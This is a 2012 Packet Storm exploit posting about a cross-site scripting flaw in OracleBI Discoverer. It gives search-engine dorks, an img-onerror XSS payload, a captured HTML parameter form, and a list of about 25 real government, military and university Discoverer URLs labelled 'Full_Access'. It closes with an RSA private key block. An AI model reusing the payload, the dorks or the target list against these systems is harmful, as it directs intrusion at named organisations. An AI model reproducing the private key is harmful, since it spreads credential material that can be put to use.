OracleBI Discoverer 10.1.2.48.18 Cross Site Scripting

2012-12-12T00:00:00
ID PACKETSTORM:118808
Type packetstorm
Reporter Ur0b0r0x
Modified 2012-12-12T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
# Author: Ur0b0r0x  
# Tiwtte: @Ur0b0r0x  
# Email: ur0b0r0x_@live.com  
# Line: GreyHat  
# Home: ur0b0r0x.blogspot.com  
  
  
# Exploit Title: OracleBI Discoverer Ver 10.1.2.48.18 - Full Acces Data Base - Cross Site Scripting  
# dork1:inurl:discoverer/viewer?  
# dork2:inurl:/discoverer/app/connection  
# dork3:inurl:/discoverer/app/econnection  
# dork4:inurl:/discoverer/app/  
# dork5:inurl:/discoverer/app/explorer"  
# Date: 12/12/2012  
# Author: Ur0b0r0x  
# Url Vendor: http://www.oracle.com/technetwork/developer-tools/discoverer/overview/index.html  
# Vendor Name: Oracle  
# Tested On: Backtrack R3 / Linux Mint  
# Type: php  
  
------------------- Agreement --------------------  
[08/12/2012] - Vulnerability discovered  
[11/12/2012] - Vendor notified Dont responsed  
[12/12/2012] - Public disclosure   
--------------------------------------------------  
  
#Proof Concept  
http://ur0b0r0x.blogspot.com/  
  
#Code/Xss/Path  
explorer?node="><img src="x" onerror="alert('XSS')" />   
  
#Code/Active contracts by Opdiv,office code,completion date - Active Contracts  
<form action="/discoverer/app/parameters" method="POST" style="margin:0px" name="parametersForm" id="parametersForm"><span id="params"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="x0">Select values for the following parameters.</span></td></tr><tr><td><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><span class="xc">*</span><img width="4" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td><span class="x2o">Indicates required field</span></td></tr></tbody></table></td></tr><tr><td><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td><table width="100%" cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_12">Please select the contract status IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'A'" size="30" name="_12" onkeypress="return _submitOnEnter(event, 'parametersForm');" class="x4" id="_12"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_12', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_12(lovwin){ _setFieldValue(document.parametersForm,"_12",lovwin.top.myDataValue);return false;}</script></td><td><script src="/discoverer/cabo/jsLibs/BIParametersLOV.js" language="javascript"></script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select the contract status IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_14">Please select Office Code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'00102'" size="30" name="_14" class="x4" id="_14"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_14', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_14(lovwin){ _setFieldValue(document.parametersForm,"_14",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select Office Code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_16">Please select Completion Date prior to</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><input type="text" value="'01-JUN-2007'" size="30" name="_16" class="x4" id="_16"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Date Format 'DD-MON-YYYY' (Example: 12-DEC-2012)</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><span class="x8"><span class="xc" title="Required">*</span> <label for="_18">Please select component code IN</label></span></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><table cellspacing="0" cellpadding="0" border="0" summary=""><tbody><tr><td><input type="text" value="'IHS'" size="30" name="_18" class="x4" id="_18"><img width="8" height="1" alt="" src="/discoverer/cabo/images/t.gif"><a href="#" onclick="var f=document.parametersForm;_submitPartialChange('parametersForm',0,{source:'params',event:'bi_lo_frm_sb',bi_lovID:'_18', partialTargets:'paramsscriptId'});return false;"><img width="24" height="24" border="0" align="absmiddle" alt="Go initiate search" title="Go initiate search" src="/discoverer/cabo/images/cache/clovi.gif"></a></td><td><script language="javascript">function biCallbackparametersForm_18(lovwin){ _setFieldValue(document.parametersForm,"_18",lovwin.top.myDataValue);return false;}</script></td></tr></tbody></table></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><span class="x2o">Please select component code IN</span></td></tr><tr><td width="20px"><img width="20" height="1" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="25%" align="right" class="x8"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="12"><img width="12" height="0" alt="" src="/discoverer/cabo/images/t.gif"></td><td width="75%" align="left"><img width="5" height="5" alt="" src="/discoverer/cabo/images/t.gif"></td></tr></tbody></table></td></tr></tbody></table><script language="javascript">function paramsbi_selectParams() {var f=document.parametersForm;submitForm('parametersForm',1,{event:'bi_selectParams',source:'params',bi_cPath:'params'});}</script><input type="hidden" name="bi_viewNames" value="params"></span><span id="paramsscriptId"></span><a onclick="paramsbi_selectParams();" accesskey="o" href="#"><img width="35" height="18" border="0" align="middle" alt="Go" title="Go" src="/discoverer/cabo/images/cache/en/bGoGl9n.gif"></a><input type="hidden" name="stateStr" value="eNqNU11v2jAU/TMh2mS1ssNH24c8IGDapg0mtX2OHNspAScOtokDv37XCaURtN0eyLUv5577ca4DtzVrGwyiEa8TbsAOoslOmqQZRORhMJzPc8NULbTQD/ntk7JUopnal7YHG13CZqqoVClKC1AuAGmNSYCb4Evks7R5Qa1APkQKm6sSzeE$iGZyDZ9S6YJKOGRUGs$0q5KZKq2mzCJjqd0b9IdqWggrNAF2$E2zLPNm2q$RXGZeaS40Wu4LtHwBHFUOEOcsp6i79wcwdVRzH6R3/aAqWWVZzkTb9btljcFgTHDUL214VdobS0d7nhJ7mxL3d6t6LXuLyc3P5$VNhPFdP8X9ZYq5kpJqg1apzF$AiffAkys591p3Yl5oNMkKwDYFCDQxxsDZ6n1/fuP/1/u8I$R6m056v4r12Wq8Lh77SAKY9vTH98f$dPA/M56h0YfQx3YZAcq5gT/bhP5RwafZ3pBCIvAa6PfoyC12aHtoeI1SenRwYeboorE7NBVDNQDc5tBseH2AYAfSjE4tjiRrHyjQ2vRTYpsemjQ30nrD1sqztqQn56aFAEXlR2TW3cMfudofCMFd7a07YGUQ1szGpuYhK7cxyxIKiIBWgW83g1bBys6YzpSss9y7A9FUMghNFYclyBKTUNSgUQxuWvLQP2MRf7kffg21UjbGoUttHAWVznmw$LX4vVg$wSZF3wgOmD1UQZ0LJ/RfFGiQmw=="><span id="_parametersForm_Postscript"><input type="hidden" name="source"><input type="hidden" name="event"><input type="hidden" name="bi_lovID"><input type="hidden" name="partial"><input type="hidden" name="partialTargets"><input type="hidden" name="bi_cPath"><script>var _resetparametersFormNames=["source","event","bi_lovID","partial","partialTargets","bi_cPath"];</script><script>var _parametersForm_Validations=['_isEmpty(%value%)'];function _parametersFormValidater(form){var fl = _multiValidate(form,[0,"_12",0,0,0,"_14",0,0,0,"_16",0,0,0,"_18",0,0]);if(fl.length>0){_validationAlert('Form validation failures:'+fl);return false;}else{return true;}}var _parametersForm_Labels={'_12':'Please select the contract status IN','_14':'Please select Office Code IN','_16':'Please select Completion Date prior to','_18':'Please select component code IN'};var _parametersForm_Formats=['A value must be entered for "%label%".'];function _submitOnEnter(e,frm){return (_getKC(e)!=13);}</script></span><script>_submitFormCheck();</script></form>  
  
  
Sample/Demo/Full_Access/  
http://dcis04.psc.gov/discoverer/app/econnection  
http://abac.upf.edu/discoverer/app/econnection  
http://mytest.sfwmd.gov/discoverer/app/econnection  
http://demoa.ocu.es/discoverer/app/econnection  
http://www.paaf.gov.kw/discoverer/viewer  
http://www.qix.gov.qa/discoverer/app/econnection  
http://discoverer.banrep.gov.co/discoverer/app/econnection  
http://statistik.forsakringskassan.se/discoverer/app/econnection  
https://oasext.epa.gov/discoverer/app/econnection  
http://www.reeis.usda.gov/discoverer/app/connection  
http://cbi.superfinanciera.gov.co/discoverer/app/econnection  
http://mytest.sfwmd.gov/discoverer/app/econnection  
http://owl.cuny.edu:7778/discoverer/app/econnection  
http://oaspruebas.policia.gov.co:7778/discoverer/app/connection?event=displayConnections  
http://siadapp.dmdc.osd.mil/discoverer/viewer  
http://xportalt.sfwmd.gov/discoverer/app/connection  
http://siadapp.dmdc.osd.mil/discoverer/viewer  
http://www.cdr.isa.org.jm/discoverer/app/econnection  
http://suamox03.dane.gov.co:7778/discoverer/app/econnection  
http://iaorap1.mincetur.gob.pe:7778/discoverer/viewer  
http://discoverer.dnr.state.la.us/discoverer/app/connection  
http://www.moi.go.th/discoverer/app/econnection  
http://www.reeis.usda.gov/discoverer/app/econnection  
http://www.st.nmfs.noaa.gov/discoverer/app/connection  
http://portal.nysed.gov/discoverer/app/connection  
http://190.242.99.238/discoverer/app/econnection  
  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`